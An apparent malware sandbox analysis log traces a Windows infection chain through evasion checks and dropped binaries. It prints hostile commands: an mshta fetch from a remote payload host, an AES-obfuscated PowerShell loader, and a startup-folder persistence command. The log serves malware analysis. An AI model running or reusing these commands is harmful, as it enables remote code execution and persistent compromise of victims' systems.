Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1650
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6558
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3213
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4539
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeAPI coverage: 3.8 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep count: 1650 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep count: 1660 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 932Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5024Thread sleep count: 4686 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 4539 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00007FF79F8EC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EBC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00007FF79F8F72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F71F4 FindFirstFileW,FindClose,10_2_00007FF79F8F71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2F50 FindFirstFileExW,10_2_00007FF79F8B2F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00007FF79F8FA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F6428 FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF79F8F6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA350
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F14005
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_00F1494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_00F1CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD14 FindFirstFileW,FindClose,20_2_00F1CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F13CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A24005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_00A2494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_00A2CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD14 FindFirstFileW,FindClose,24_2_00A2CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A23CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F891D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_00007FF79F891D80
Source: powershell.exe, 00000012.00000002.2225326602.000002DAE8954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000005.00000002.1941084329.000001DB651F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Connec
Source: wscript.exe, 00000017.00000003.2144768150.000002AD9927F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000004.00000002.2935442187.000001CA4002B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000005.00000002.1940018341.000001DB64F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll, th""B
Source: mshta.exe, 00000003.00000002.1966235459.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966416203.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965170677.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2938716293.000001CA45855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000012.00000002.2225326602.000002DAE8935000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.2939514467.0000000003FD7000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2939564124.00000000043B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900A00 BlockInput,10_2_00007FF79F900A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8737B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00007FF79F8737B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F895BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,10_2_00007FF79F895BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F907634 LoadLibraryA,GetProcAddress,10_2_00007FF79F907634
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,10_2_00007FF79F8DD868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8959C8 SetUnhandledExceptionFilter,10_2_00007FF79F8959C8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8957E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF79F8957E4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B8FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF79F8B8FE4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8AAF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FF79F8AAF58
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00EDA385
Source: C:\Users\Public\Guard.exeCode function: 20_2_00EDA354 SetUnhandledExceptionFilter,20_2_00EDA354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_009EA385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_009EA354 SetUnhandledExceptionFilter,24_2_009EA354

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DCE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,10_2_00007FF79F8DCE68
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8737B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00007FF79F8737B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8E9420 SendInput,keybd_event,10_2_00007FF79F8E9420
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8ED1A4 mouse_event,10_2_00007FF79F8ED1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/ghep1
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($vuOOVEuV){return -split ($vuOOVEuV -replace '..', '0x$& ')};$ernnEW = clean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oZcBKP = [System.Security.Cryptography.Aes]::Create();$oZcBKP.Key = clean('614A73516F706C757242416C6E617351');$oZcBKP.IV = New-Object byte[] 16;$nFAfpwETU = $oZcBKP.CreateDecryptor();$jftLKJake = [Text.Encoding]::UTF8.GetString($nFAfpwETU.TransformFinalBlock($Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Marketing.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function clean ($vuooveuv){return -split ($vuooveuv -replace '..', '0x$& ')};$ernnew = clean('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');$ozcbkp = [system.security.cryptography.aes]::create();$ozcbkp.key = clean('614a73516f706c757242416c6e617351');$ozcbkp.iv = new-object byte[] 16;$nfafpwetu = $ozcbkp.createdecryptor();$jftlkjake = [text.encoding]::utf8.getstring($nfafpwetu.transformfinalblock($
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DC858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_00007FF79F8DC858
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00007FF79F8DD540
Source: powershell.exe, 00000005.00000002.1891591827.000001DB5D032000.00000004.00000800.00020000.00000000.sdmp, PefjSkkhb.exe, 0000000A.00000002.1916467152.00007FF79F948000.00000002.00000001.01000000.0000000D.sdmp, Guard.exe, 00000014.00000003.1997962560.0000000004CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: PefjSkkhb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8AFD20 cpuid 10_2_00007FF79F8AFD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
